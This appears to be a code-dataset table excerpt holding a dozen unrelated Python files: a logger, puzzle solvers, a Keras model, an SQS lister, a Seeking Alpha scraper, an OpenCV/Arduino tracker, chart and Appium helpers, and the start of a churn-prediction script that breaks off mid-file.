index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,700 | 84a989e209b3ec2637e10f076d83ecc4da6f3e7d | """
Code for getting and configuring a logger for hw5.
"""
import logging
import sys
def get_logger(log_name: str) -> logging.Logger:
    """Returns a logging instance, configured so that all non-filtered messages
    are sent to STDOUT.

    BUG FIX: the original attached a new StreamHandler on every call, so
    repeated calls with the same name produced duplicated log lines.  The
    handler is now attached only once per named logger.

    Note: the logger's level is left at the default (inherited from root),
    unchanged from the original behavior.
    """
    logger = logging.getLogger(log_name)
    if not logger.handlers:  # configure only on first retrieval
        handler = logging.StreamHandler(sys.stdout)
        handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s: %(message)s'))
        logger.addHandler(handler)
    return logger
|
from itertools import product
from time import sleep


def acumulate(tuple):
    """Yield the running (cumulative) sum of the given iterable.

    NOTE(review): the parameter name shadows the builtin `tuple`; it is kept
    unchanged to preserve the public signature.
    """
    cont = 0
    for i in tuple:
        cont += i
        yield cont


# Project Euler 18: find the maximum top-to-bottom path sum in the triangle.
piramid = """75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23""".split("\n")
piramid = [[int(j) for j in i.split(" ")] for i in piramid]
values = []
# Each 14-bit choice tuple encodes one full path: per level, 0 keeps the
# column and 1 moves one column right, so the running sum of the choices is
# the column index at every level.  (Removed an unused `cont = 0` that the
# original reset inside this loop.)
for choice in product([0, 1], repeat=14):
    v = acumulate(choice)
    values.append(sum(piramid[j][next(v)] for j in range(1, len(piramid))) + 75)
print(max(values))
|
15,702 | 2a0b39d879820107a2016986cf43fc918c829f37 | import numpy as np
import tensorflow as tf
from gensim.test.utils import datapath
from gensim.models import KeyedVectors
from tensorflow.keras import models
from tensorflow.keras import layers
import functions as fun
import attentionLayer as attention
# Vocabulary of canvas scene objects (order matters; repeated names are
# distinct instances).  Not referenced in this script body -- presumably
# consumed by `functions`/`attentionLayer`; TODO confirm.
scene_objects = ['helicopter', 'balloon', 'cloud', 'sun', 'lightning', 'rain', 'rocket', 'airplane', 'bouncy',
                 'slide', 'sandbox', 'grill', 'swing', 'tent', 'table', 'tree', 'tree', 'tree', 'boy', 'girl',
                 'bear', 'cat', 'dog', 'duck', 'owl', 'snake', 'hat', 'hat', 'hat', 'hat', 'hat', 'hat', 'hat',
                 'hat', 'glasses', 'glasses', 'pie', 'pizza', 'hotdog', 'ketchup', 'mustard', 'hamburger', 'soda',
                 'baseball', 'pail', 'ball', 'ball', 'ball', 'ball', 'ball', 'frisbee', 'bat', 'balloons', 'glove',
                 'shovel', 'racket', 'kite', 'fire']
# Word2Vec
# Pre-trained word2vec vectors loaded from the C binary format.
word2vec = KeyedVectors.load_word2vec_format(
    datapath("//home/athira/Robotic_Companion/VerbPrediction/word2vec_vectors.bin"), binary=True) # C bin format
'''
LOAD DATA
'''
# Subject and dependent embeddings plus verb targets; assumes each row is one
# sample and the verb files are one-hot over 69 classes -- TODO confirm the
# CSV layout against the data-generation code.
subjects_train = np.loadtxt('train_subjects.csv', delimiter=',')
dependents_train = np.loadtxt('train_dependents.csv', delimiter=',')
subjects_val = np.loadtxt('val_subjects.csv', delimiter=',')
dependents_val = np.loadtxt('val_dependents.csv', delimiter=',')
y_train = np.loadtxt('train_verbs.csv', delimiter=',')
y_val = np.loadtxt('val_verbs.csv', delimiter=',')
# Concatenate subject and dependent vectors into a single 600-d input
# (the model's input_shape below is (600,)).
x_train = np.concatenate([subjects_train, dependents_train], axis=1)
x_val = np.concatenate([subjects_val, dependents_val], axis=1)
batch_size = 32
# Three-layer MLP with heavy dropout; the final Dense(69) emits raw logits
# (no activation) because the loss below applies the softmax itself.
model = models.Sequential()
model.add(layers.Dropout(0.5, input_shape=(600,)))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(69))
# Selecting the type of loss function and optimizer.
# softmax_cross_entropy_with_logits expects one-hot labels and raw logits.
model.compile(optimizer='SGD', loss=tf.nn.softmax_cross_entropy_with_logits)
'''
TRAINING THE MODEL
'''
# Checkpoint to save weights at the lowest validation loss seen so far.
checkpoint_filepath = '/tmp/checkpoint'
model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
    filepath=checkpoint_filepath,
    save_weights_only=True,
    monitor='val_loss',
    mode='min',
    save_best_only=True)
num_epochs = 1000
history = model.fit(x_train, y_train, epochs=num_epochs, batch_size=batch_size, validation_data=(x_val, y_val), callbacks=[model_checkpoint_callback])
# Loading the best (lowest val_loss) weights back into the model.
model.load_weights(checkpoint_filepath)
# Save this model's weights under a permanent name.
model.save_weights('verb_prediction_from_dependent_model')
# Training history for plotting.
history_dict = history.history
loss_values = history_dict['loss']
val_loss_values = history_dict['val_loss']
num_epochs = len(val_loss_values)
# Plot the train/validation loss curves.
fun.plot_loss(num_epochs, loss_values, val_loss_values)
# Calculate perplexity on the validation set with the saved weights.
model.load_weights('verb_prediction_from_dependent_model') # Load the model
perplexity = fun.calculate_perplexity(x_val, y_val, model)
print("Perplexity: " + str(perplexity))
|
15,703 | ce9fefdd3729eb8710b4ebfc19c0d9152f88197b | import boto3
# Create SQS client.
# NOTE(review): uses the default boto3 session, so credentials and region come
# from the environment / ~/.aws config -- confirm a region is configured.
sqs = boto3.client('sqs')
# List SQS queues for this account/region.
# NOTE(review): the response presumably omits 'QueueUrls' when no queues
# exist, which would make the print below raise KeyError -- verify.
response = sqs.list_queues()
print(response['QueueUrls']) |
15,704 | 0dcdcdfcb1dcefcc81a236b9e84f080247caaafb | from __future__ import print_function
import mysql.connector
import requests
import time
import json
from http.cookies import SimpleCookie
from bs4 import BeautifulSoup
##################################
# #
# CONSTANTS #
# #
##################################
# After you set up your mySQL database, alter the information in this
# file.
db_config_file = "../config/db_config.json"
# Log into SA, then copy paste your cookie into this file.
raw_cookie_file = "../config/raw_cookie.txt"
user_agent = {'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2)' +
' AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
add_article = ("INSERT INTO articles"
"(articleID, ticker_symbol, published_date, author_name, title, text, num_likes, includes_symbols)"
"VALUES (%(articleID)s, %(ticker_symbol)s, %(published_date)s, %(author_name)s, %(title)s, %(text)s,"
" %(num_likes)s, %(includes_symbols)s)")
add_comment = ("INSERT INTO comments"
"(articleID, commentID, userID, comment_date, content, parentID, discussionID)"
"VALUES (%(articleID)s, %(commentID)s, %(userID)s, %(comment_date)s, %(content)s, %(parentID)s,"
"%(discussionID)s)")
##################################
# #
# DATA CLASSES #
# #
##################################
class Article:
    # Scrapes one Seeking Alpha article page and exposes it as a row-ready json.
    def __init__(self, _id, a_cookie, a_user_agent):
        """
        Initializes all fields with default values then parses the
        information from the url.
        """
        self._id = _id
        self.ticker = ''
        self.pub_date = '0001-01-01'
        self.author = ''
        self.title = ''
        self.text = ''
        self.includes = ''
        # NOTE(review): `comments` is never populated in this class --
        # comments are fetched separately by get_comment_jsons(); confirm.
        self.comments = []
        self.valid = True
        self._parse_article(a_cookie, a_user_agent)
    def _parse_article(self, a_cookie, a_ua):
        """
        Parses article info from the given url.

        Fetches the page twice: once anonymously (full text) and once logged
        in (metadata).  NOTE(review): the a_ua parameter is unused here --
        safe_request applies the module-level user_agent instead.
        """
        url = "https://seekingalpha.com/article/%s" % self._id
        r = safe_request(url, {})
        r_login = safe_request(url, a_cookie)
        soup_log = BeautifulSoup(r_login.text, 'html.parser')
        # Stops process if article invalid
        primary_about = soup_log.find_all("a", href=True, sasource="article_primary_about")
        if len(primary_about) != 1:
            # Excludes non-single-ticker articles
            print("Invalid Article")
            self.valid = False
            return
        else:
            # Last whitespace-separated token, with surrounding parentheses
            # stripped, e.g. "(AAPL)" -> "AAPL".
            self.ticker = primary_about[0].text.split()[-1][1:-1]
        # Gets all included tickers and the author name, comma-joined.
        about = soup_log.find_all("a", href=True)
        for a in about:
            if 'sasource' in a.attrs:
                if a.attrs['sasource'] == "article_about":
                    self.includes += a.text + ","
                elif a.attrs['sasource'] == "auth_header_name":
                    self.author += a.text + ","
        # Drop the trailing comma left by the loops above.
        self.includes = self.includes[:-1]
        self.author = self.author[:-1]
        self.title = soup_log.find_all('h1')[0].text
        self.pub_date = soup_log.find_all('time', itemprop="datePublished")[0]['content'][:10]
        # Get Full Article Text: every <p> up to the disclosure paragraph.
        name_box = BeautifulSoup(r.text, 'html.parser').find_all('p')
        print(name_box)
        try:
            disc_idx = list(filter(lambda i: 'id' in name_box[i].attrs and name_box[i]['id'] == 'a-disclosure',
                                   range(len(name_box))))[0]
        except IndexError:
            # No disclosure marker found: keep all paragraphs.
            disc_idx = len(name_box)
        self.text = ''.join(map(lambda x: x.text + "\n", name_box[:disc_idx]))
    def json(self):
        """
        Returns json representation of an article (for writing
        to the database).

        Returns {} for invalid articles so callers can skip them.
        """
        if self.valid:
            return {
                'articleID': self._id,
                'ticker_symbol': self.ticker,
                'published_date': self.pub_date,
                'author_name': self.author,
                'title': self.title,
                'text': self.text,
                'num_likes': 0,
                'includes_symbols': self.includes
            }
        return {}
class Comment:
    """A single comment on a Seeking Alpha article.

    Wraps one JSON object from the ajax comment feed so the reply tree can
    be flattened and each comment serialized for database insertion.
    """

    def __init__(self, article_id, comment):
        self.articleID = article_id
        self.commentID = comment['id']
        self.userID = comment['user_id']
        self.date = comment['created_on'][:10]  # keep only the YYYY-MM-DD part
        self.text = comment['content']
        self.parentID = comment['parent_id']
        self.discussionID = comment['discussion_id']
        self.children_ids = comment['children']

    def get_children(self):
        """Recursively flatten all descendant comments into a single list."""
        descendants = []
        for key in self.children_ids:
            node = Comment(self.articleID, self.children_ids[key])
            descendants.append(node)
            descendants.extend(node.get_children())
        return descendants

    def json(self):
        """Return the dict used as parameters for the comment INSERT."""
        ascii_text = self.text.encode('ascii', errors='ignore').decode()
        return {
            'articleID': self.articleID,
            'commentID': self.commentID,
            'userID': self.userID,
            'comment_date': self.date,
            'content': ascii_text,
            'parentID': self.parentID,
            'discussionID': self.discussionID
        }
##################################
# #
# FILE FUNCTIONS #
# #
##################################
def read_json_file(filename):
    """
    Reads a json formatted file.

    Returns the parsed object, or an empty dict when the file does not
    contain valid JSON.  A missing file still raises (unchanged behavior).
    """
    with open(filename) as f:
        try:
            data = json.loads(f.read())
        except ValueError:
            # json.JSONDecodeError subclasses ValueError; the original bare
            # `except` also swallowed unrelated errors (even KeyboardInterrupt).
            data = {}
    return data
def write_json_file(json_data, filename):
    """
    Writes a json to a file.

    Returns True on success, False when serialization or writing runs out
    of memory.  Other errors (e.g. non-serializable data) propagate.
    """
    try:
        payload = json.dumps(json_data)
        with open(filename, "w") as out:
            out.write(payload)
    except MemoryError:
        return False
    else:
        return True
def browser_cookie(rawcookie):
    """Convert a raw browser cookie header string into a plain dict.

    SimpleCookie is dictionary-like but stores Morsel objects internally,
    which `requests` cannot consume, so the values are copied out into an
    ordinary dict.
    Reference: https://stackoverflow.com/questions/32281041/converting-cookie-string-into-python-dict
    """
    parsed = SimpleCookie()
    parsed.load(rawcookie)
    return {name: morsel.value for name, morsel in parsed.items()}
def default_cookie():
    """Build the request cookie dict from the raw cookie file on disk."""
    with open(raw_cookie_file) as f:
        return browser_cookie(f.read())
def default_db_config():
    """Load the MySQL connection settings from the default config file."""
    return read_json_file(db_config_file)
def safe_request(url, cookie):
    """
    Continues trying to make a request until a certain amount of
    tries have failed.

    Returns the requests.Response, or the empty string "" when every
    attempt was blocked -- callers must tolerate that sentinel.
    NOTE(review): connection errors never increment `count`, so the loop
    retries forever on network failure -- confirm this is intended.
    """
    count = 0
    r = ""
    # Adjust this number if a certain amount of failed attempts
    # is acceptable (non-200 responses count toward it).
    while count < 1:
        try:
            r = requests.get(url, cookies=cookie, headers=user_agent)
            if r.status_code != 200:
                print(r.status_code, "blocked")
                count += 1
            else:
                break
        except requests.exceptions.ConnectionError:
            # Back off briefly before retrying the same URL.
            print("timeout", url)
            time.sleep(1)
    return r
def get_comment_jsons(article_id, cookie):
    """
    Returns all comments for the given article as array of
    jsons.

    The reply tree is flattened so every descendant becomes its own row.
    NOTE(review): safe_request can return "" after repeated blocks, in
    which case r.status_code would raise AttributeError -- confirm.
    """
    url = "https://seekingalpha.com/account/ajax_get_comments?id=%s&type=Article&commentType=" % article_id
    r = safe_request(url, cookie)
    comments = []
    if r.status_code != 404:
        res = json.loads(r.text)
        for comment in res['comments'].values():
            c = Comment(article_id, comment)
            comments.append(c.json())
            # Include every nested reply, not just the top-level comment.
            comments.extend(map(lambda x: x.json(), c.get_children()))
    return comments
def try_add_comment(com_jsons, cursor, article_id):
    """
    Given array of comment jsons, adds comments to database.

    Duplicate-key errors (MySQL errno 1062) are skipped silently; any other
    database error is reported with the offending comment's id.
    """
    if not com_jsons:
        print("\t No comments found for " + article_id)
    for c in com_jsons:
        try:
            cursor.execute(add_comment, c)
        except mysql.connector.DatabaseError as err:
            if not err.errno == 1062:
                # BUG FIX: the comment jsons use the key "commentID" (see
                # Comment.json), so the original c["id"] raised KeyError
                # right here in the error path.
                print("Wrong Comment Format: " + str(c["commentID"]))
def try_add_article(art_json, cursor):
    """
    Given an article json, tries to write that article to database.

    An article whose primary key already exists is skipped with a notice
    rather than raising.
    """
    try:
        cursor.execute(add_article, art_json)
    except mysql.connector.errors.IntegrityError:
        print("Duplicate Article")
def try_add_db(art_json, com_jsons, cursor, article_id):
    # Convenience wrapper: store the article row, then all of its comments.
    # The caller is responsible for committing the transaction.
    try_add_article(art_json, cursor)
    try_add_comment(com_jsons, cursor, article_id)
def gather_mysql_data(article_fn, start=0, stop=None, comments_only=False):
    """
    Given a file with Seeking Alpha article ids separated by commas, iterates
    through the article ids in the article and records the article and comment
    data in the mysql database.

    article_fn    -- path to the comma-separated article-id file
    start, stop   -- slice of the id list to process (supports resuming)
    comments_only -- when True, skip article scraping and store only comments
    """
    config = default_db_config()
    cookie = default_cookie()
    cnx = mysql.connector.connect(**config)
    cursor = cnx.cursor()
    with open(article_fn) as f:
        articles = f.read().split(",")
    i, total = start+1, float(len(articles))
    for a in articles[start: stop]:
        if comments_only:
            com_jsons = get_comment_jsons(a, cookie)
            try_add_comment(com_jsons, cursor, a)
        else:
            # json() is empty for invalid (non-single-ticker) articles.
            art_json = Article(a, cookie, user_agent).json()
            if art_json:
                com_jsons = get_comment_jsons(a, cookie)
                try_add_db(art_json, com_jsons, cursor, a)
        # Commit after every article so progress survives a crash.
        cnx.commit()
        print("%0.4f" % (i/total*100), "%\t Article idx:", i-1)
        i += 1
    cursor.close()
    cnx.close()
if __name__ == '__main__':
    # Collection has not been updated in a long time so there are some
    # aspects of the pipeline that do not seem to work anymore. While
    # writing to the database seems fine, getting the full article text seems
    # to be not working again.
    # Smoke-test: parse a single known article and print its json.
    a = Article("239509", default_cookie(), user_agent)
    print(a.json())
    # Do NOT run collection of articles before that bug has been fixed because
    # you will overwrite your database with the truncated text version of these
    # articles.
|
class Film:
    """A film in the cinema catalogue.

    Attributes:
        id      -- int, unique identifier
        titlu   -- str, title
        an      -- str of the form dd.mm.yyyy (release date)
        pret    -- int, ticket price
        program -- list of 'hh:mm' showtime strings
    """

    def __init__(self, idf, titlu, an, pret, program):
        self.id = idf
        self.titlu = titlu
        self.an = an
        self.pret = pret
        self.program = program

    def setID(self, idf):
        """Set the film's id (int)."""
        self.id = idf

    def setTitlu(self, titlu):
        """Set the film's title (str)."""
        self.titlu = titlu

    def setAn(self, an):
        """Set the film's release date (str, dd.mm.yyyy)."""
        self.an = an

    def setPret(self, pret):
        """Set the ticket price (int)."""
        self.pret = pret

    def setProgram(self, program):
        """Set the showtime list (list of 'hh:mm' strings)."""
        self.program = program

    def getID(self):
        """Return the film's id (int)."""
        return self.id

    def getTitlu(self):
        """Return the film's title (str)."""
        return self.titlu

    def getAn(self):
        """Return the release date (str, dd.mm.yyyy)."""
        return self.an

    def getPret(self):
        """Return the ticket price (int)."""
        return self.pret

    def getProgram(self):
        """Return the showtime list (list of 'hh:mm' strings)."""
        return self.program

    def validProgram(self, program):
        """Return True when EVERY entry of `program` is a valid 'hh:mm' time.

        BUG FIX: the original returned True as soon as the FIRST entry was
        valid, accepting schedules with invalid later entries.  An empty
        schedule is still considered invalid (unchanged behavior).
        """
        if not program:
            return False
        try:
            for entry in program:
                hh, mm = entry.split(":")
                hh, mm = int(hh), int(mm)
                # hour upper bound kept at 24 as in the original, to avoid
                # tightening behavior beyond the reported bug
                if not (0 <= hh <= 24 and 0 <= mm < 60):
                    return False
        except (ValueError, AttributeError):
            # malformed entry: wrong shape, non-numeric, or not a string
            return False
        return True

    def valid(self):
        """Return True if price, year and schedule are all valid.

        NOTE(review): `an` is documented as a 'dd.mm.yyyy' string, so the
        `> 0` comparison raises TypeError for strings and such films are
        always reported invalid -- confirm whether `an` should be numeric.
        """
        try:
            if self.getPret() > 0 and self.getAn() > 0 and self.validProgram(self.getProgram()):
                return True
        except TypeError:
            pass
        return False
|
15,706 | 0c4c46f1dfa34f190cbbca7ad2a382aa2ef9f274 | from django.db import models
# Create your models here.
class Superheroes(models.Model):
    """Django model storing a superhero's name.

    BUG FIX: the original inherited from an undefined `super_heroes.Superheroes`
    and used `Charfield` (wrong capitalization); a Django model must derive from
    models.Model and use models.CharField.
    """
    name = models.CharField(max_length=50)
|
def solve(x, tmp):
    """Return the time needed to level the whole N x M ground to height x.

    tmp is the starting block inventory: dug-out blocks are added to it
    (2 seconds each) and placed blocks are taken from it (1 second each).
    Returns 10e9 as an "impossible" sentinel when the inventory would go
    negative.
    """
    global N, M, mat
    elapsed = 0
    for row in mat:
        for height in row:
            delta = x - height
            if delta < 0:
                # ground above target: dig |delta| blocks, 2s per block
                tmp -= delta          # -delta == abs(delta) here
                elapsed -= 2 * delta
            else:
                # ground below target: place delta blocks, 1s per block
                tmp -= delta
                elapsed += delta
    return elapsed if tmp >= 0 else 10e9
# Read the grid size, inventory B, and the height map from stdin.
N, M, B = map(int, input().split())
mat = [list(map(int, input().split())) for _ in range(N)]
# BUG FIX: max(max(mat)) / min(min(mat)) compare ROWS lexicographically and
# then take the extreme of that one row, which is not the global extreme
# (e.g. [[1, 9], [2, 0]] gave 2 instead of 9).  Flatten per row instead.
max_h = max(max(row) for row in mat)
min_h = min(min(row) for row in mat)
result1 = 10e9   # best (minimum) time found
result2 = -1     # highest target height achieving that time
for target in range(min_h, max_h + 1):
    tmp_result = solve(target, B)
    # >= so that, on ties, the larger height (scanned later) wins.
    if result1 >= tmp_result:
        result1 = tmp_result
        result2 = max(result2, target)
print(result1, result2)
# def solve(x,y,tmp): #시간초과
# global N,M,mat
# time = 0
# for i in range(N):
# for j in range(M):
# cal = mat[x][y] - mat[i][j]
# abso = abs(cal)
# if cal < 0 :
# tmp += abso
# time += 2*abso
# elif cal >= 0 :
# tmp -= abso
# time += abso
# if tmp >= 0 :
# return time
# else :
# return 10e9
# N, M, B = map(int,input().split())
# mat = [ list(map(int,input().split())) for _ in range(N) ]
# visit = [False for _ in range(257)]
# result1 = 10e9
# result2 = -1
# for i in range(N):
# for j in range(M):
# if visit[mat[i][j]] == False :
# visit[mat[i][j]] = True
# tmp = solve(i,j,B)
# if result1 > tmp :
# result1 = tmp
# result2 = max(result2, mat[i][j])
# print(result1, result2) |
15,708 | 9af20f024a9050dcd156d57e396a376938fde47c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : AwesomeTang
# @File : line_with_shadow.py
# @Version : Python 3.7
# @Time : 2020-11-01 13:05
from pyecharts.charts import *
from pyecharts import options as opts
import random
# Shared ECharts line style used by both series below.
line_style = {
    'normal': {
        'width': 4,  # line width
        'shadowColor': 'rgba(155, 18, 184, .3)',  # shadow colour
        'shadowBlur': 10,  # shadow blur radius
        'shadowOffsetY': 10,  # shadow offset along the Y axis
        'shadowOffsetX': 10,  # shadow offset along the X axis
        'curve': 0.5  # curvature of the line; 1 means no curve
    }
}
# One x label per day of October 2020.
x_data = ["2020/10/{}".format(i + 1) for i in range(30)]
# Randomly generated upward-trending sample points for the two series.
y_data_1 = [i + random.randint(10, 20) for i in range(len(x_data))]
y_data_2 = [i + random.randint(15, 25) for i in range(len(x_data))]
def line_with_shadow():
    """Build a smoothed two-series line chart using the shared shadow style."""
    line = Line(init_opts=opts.InitOpts(theme='light',
                                        width='1000px',
                                        height='600px'))
    line.add_xaxis(x_data)
    line.add_yaxis("Android",
                   y_data_1,
                   is_symbol_show=False,
                   is_smooth=True,
                   # pass in the shared line-style options
                   linestyle_opts=line_style)
    line.add_yaxis("IOS",
                   y_data_2,
                   is_symbol_show=False,
                   is_smooth=True,
                   # pass in the shared line-style options
                   linestyle_opts=line_style)
    # Chart title (Chinese): "daily active users per platform" trend.
    line.set_global_opts(title_opts=opts.TitleOpts(title="终端日活趋势"))
    return line
if __name__ == '__main__':
    # Render the chart to a standalone HTML file.
    chart = line_with_shadow()
    chart.render(path='chart_output/line_with_shadow.html')
|
15,709 | c790169ab5e4c81909436f2ad25adfac84dad2f6 | import yaml
from appium import webdriver
from page.po01_mainpagge import MainPage
from page.basepage import BasePage
class App(BasePage):
    """Entry object for the app under test: session start/stop and navigation."""
    # NOTE: this runs at class-definition (import) time, so the yaml file must
    # exist relative to the runner's CWD; loads the 'wework' capability set.
    with open("../datas/desired_caps.yaml", encoding='UTF-8') as f:
        caps = yaml.safe_load(f)["wework"]
    def start(self):
        # Reuse the existing session when there is one; otherwise open a new
        # Appium session against the local server.
        if self.driver is None:
            self.driver = webdriver.Remote("http://localhost:4723/wd/hub", self.caps)
        else:
            self.driver.launch_app()
        self.driver.implicitly_wait(10)
        return self
    def restart(self):
        # Close the current app window, then relaunch the app under test.
        self.driver.close()
        self.driver.launch_app()
        return self
    def stop(self):
        # Quit ends the whole Appium session.
        self.driver.quit()
    def goto_mainpage(self):
        # Hand the live driver to the main page object.
        return MainPage(self.driver)
|
15,710 | 2c4181c367faea32797e27cc34e5296266f677db | import serial.tools.list_ports
import numpy
import matplotlib
import cv2
from pyfirmata import Arduino, util
from time import clock, sleep
def wait(lengthMS):
    """Busy-wait for lengthMS milliseconds.

    BUG FIX: time.clock() (imported at the top of the file) was removed in
    Python 3.8, so this raised at call time on modern interpreters; use
    time.perf_counter() instead, which measures the same wall-clock span.
    """
    from time import perf_counter  # local import: top-level only imports clock/sleep
    start = perf_counter()
    while (perf_counter() - start) * 1000 < lengthMS:
        pass
def callback(value):
    """No-op trackbar callback required by cv2.createTrackbar."""
    return None
def setup_trackbars(range_filter):
    """Create a 'Trackbars' window with a MIN and MAX slider per channel.

    MIN sliders start at 0, MAX sliders at 255 (all MIN first, then all MAX,
    matching the order get_trackbar_values reads them back).
    """
    cv2.namedWindow("Trackbars", 0)
    for bound, default in (("MIN", 0), ("MAX", 255)):
        for channel in range_filter:
            cv2.createTrackbar("%s_%s" % (channel, bound), "Trackbars", default, 255, callback)
def setUpArduino():
    """Find and connect to the first Arduino visible on a serial port.

    Returns the connected Arduino board; exits the program when none can be
    connected (so callers never actually receive None).
    """
    ports = list(serial.tools.list_ports.comports())
    connectedDevice = None
    for p in ports:
        if 'Arduino' in p[1]:
            try:
                connectedDevice = Arduino(p[0])
                print("Connected to " + str(connectedDevice))
                break
            except serial.SerialException:
                # Keep scanning remaining ports on a failed connection.
                print("Arduino detected but unable to connect to " + p[0])
    # BUG FIX: the original tested `connectedDevice is NoneType`, which raised
    # NameError (NoneType is not a builtin); the intended check is `is None`.
    if connectedDevice is None:
        exit("Failed to connect to Arduino")
    return connectedDevice
def get_trackbar_values(range_filter):
    """Read the current slider positions: all MIN values first, then all MAX."""
    return [cv2.getTrackbarPos("%s_%s" % (channel, bound), "Trackbars")
            for bound in ("MIN", "MAX")
            for channel in range_filter]
def processImage(image):
    """Threshold `image` with the current RGB trackbar bounds, clean up the
    mask, and draw the detected external contours onto the image.

    Returns (annotated image, contours).
    """
    v1_min, v2_min, v3_min, v1_max, v2_max, v3_max = get_trackbar_values('RGB')
    # FIX: the original computed an identical `thresh` mask first and never
    # used it -- one inRange pass is enough.
    mask = cv2.inRange(image, (v1_min, v2_min, v3_min), (v1_max, v2_max, v3_max))
    mask = cv2.erode(mask, None, iterations=2)
    mask = cv2.dilate(mask, None, iterations=2)
    # [-2] selects the contour list across OpenCV versions that return
    # either 2 or 3 values from findContours.
    cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
                            cv2.CHAIN_APPROX_SIMPLE)[-2]
    cv2.drawContours(image, cnts, -1, (0, 255, 0), 1)
    return image, cnts
def main():
    """Track a colour-thresholded object from the webcam and drive an LED
    on Arduino pin d5 whenever a large enough contour is visible.

    Keys: 'p' freezes a processed frame (press 'p' again to quit from the
    frozen view); 'q'/ESC quits.
    """
    camera = cv2.VideoCapture(0)
    setup_trackbars('RGB')
    arduino = setUpArduino()
    # NOTE(review): setUpArduino exits the process on failure, so this None
    # check appears unreachable -- confirm.
    if(arduino is None):
        print("Arduino not connected")
        exit()
    light = arduino.get_pin("d:5:p")
    while True:
        ret, image = camera.read()
        # Wait for a button press
        key = cv2.waitKey(25) & 0xFF
        if key == ord("p"):
            # Freeze: show one processed frame and wait for the next key.
            processedImage, contours = processImage(image)
            cv2.imshow("Original", processedImage)
            key = cv2.waitKey(0) & 0xFF
            if key == ord('p'):
                break
            elif key == ord('q') or key == 27:
                # NOTE(review): this releases the camera and then `continue`s,
                # so the next camera.read() runs on a released device -- likely
                # a bug; confirm intended behavior.
                cv2.destroyAllWindows()
                camera.release()
                continue
        elif key == ord('q') or key == 27:
            cv2.destroyAllWindows()
            camera.release()
            break
        processedImage , contours = processImage(image)
        cv2.imshow("Original", processedImage)
        if len(contours) > 0:
            # Light the LED only when the largest contour is big enough.
            c = max(contours, key=cv2.contourArea)
            if(cv2.contourArea(c) > 40):
                light.write(1)
            else:
                light.write(0)
        else:
            light.write(0)
if __name__ == '__main__':
    # Run the tracking loop only when executed as a script.
    main()
|
15,711 | af3e829ad9f9b34056fb9525510e028622849371 | import pandas as pd
import dask.dataframe as dd
# Build the list of DJIA ticker symbols to keep.
ticker_df = pd.read_csv('../djia_symbols.csv')
ticker_list = ticker_df.symbol.tolist()
# after downloading full dataset directly from Quandl web site
df = dd.read_csv('/home/geoff/Documents/WIKI_PRICES.csv')
# Lazy filter: rows from 2015 onward (ISO date strings compare correctly).
df2 = df[df.date >= '2015-01-01']
# FIX: the original called df2.compute() here and discarded the result,
# materializing the entire filtered frame for nothing; the single compute()
# below is sufficient.
df3 = df2[df2.ticker.isin(ticker_list)].compute()
# Keep only (ticker, date, adjusted close) under a friendlier column name.
df3['price'] = df3['adj_close']
df3 = df3[['ticker', 'date', 'price']]
df3.to_csv('data_jan2015_mar2018.csv', index=False)
|
15,712 | c2bb3f63e2d27e0dc8323e29609b03823dfd16e3 | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 26 18:44:55 2017
@author: SACHIN
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from sklearn.cross_validation import KFold
from sklearn.metrics import accuracy_score
from sklearn.metrics import log_loss
# Reading the relevant files: train/validation member ids and member profiles.
traindata = pd.read_csv('msno_train.csv')
testdata = pd.read_csv('msno_val.csv')
memberdata = pd.read_csv('Members_final_file.csv')
# Left-merge member profile features onto both sets, keyed on the user id.
traindata = pd.merge(left = traindata,right = memberdata ,how = 'left',on=['msno'])
testdata= pd.merge(left = testdata,right = memberdata ,how = 'left',on=['msno'])
# dropping non-relevant features
# BUG FIX: the original issued each of these drops twice; the second pass
# raised KeyError because the columns were already gone.  Drop each column
# exactly once.
testdata = testdata.drop(['expiration_year', 'expiration_month', 'expiration_day'], axis=1)
traindata = traindata.drop('Unnamed: 0', axis=1)
testdata = testdata.drop('Unnamed: 0', axis=1)
# Reading the transactions file.
traintransdata = pd.read_csv('train_transaction.csv')
# Dropping the target variable from the transactions data since it is
# already present in the training set.
traintransdata=traintransdata.drop('is_churn',1)
# Merging transactions data onto both sets, keyed on the user id.
# NOTE(review): the validation set is merged against the *train* transaction
# file -- confirm this is intended and not a leakage/coverage issue.
traindata = pd.merge(left = traindata,right = traintransdata ,how = 'left',on=['msno'])
testdata= pd.merge(left = testdata,right = traintransdata ,how = 'left',on=['msno'])
# Deleting the variable to free memory before the next large read.
del traintransdata
# Reading the aggregated user-logs file.
userlogsdata = pd.read_csv('allAggregateUsers.csv')
# Merging user-log aggregates onto both sets.
traindata = pd.merge(left = traindata,right = userlogsdata ,how = 'left',on=['msno'])
testdata= pd.merge(left = testdata,right = userlogsdata ,how = 'left',on=['msno'])
# Deleting the variable to free memory.
del userlogsdata
# Correlation matrix (excluding the id column) to spot highly correlated
# features; visualized as a heatmap.
corrmatrix=traindata[traindata.columns[1:]].corr()
f,ax=plt.subplots(figsize=(20,15))
sns.heatmap(corrmatrix);
# dropping highly correlated features
# The original spelled out 48 individual .drop() calls (24 columns, each
# dropped from train and test); build the column list once instead.
corr_cols = ['%s_%s' % (day, stat)
             for stat in ('unq', '100', '985', '75', '25', '50')
             for day in ('mon', 'tue', 'wed', 'thu')]
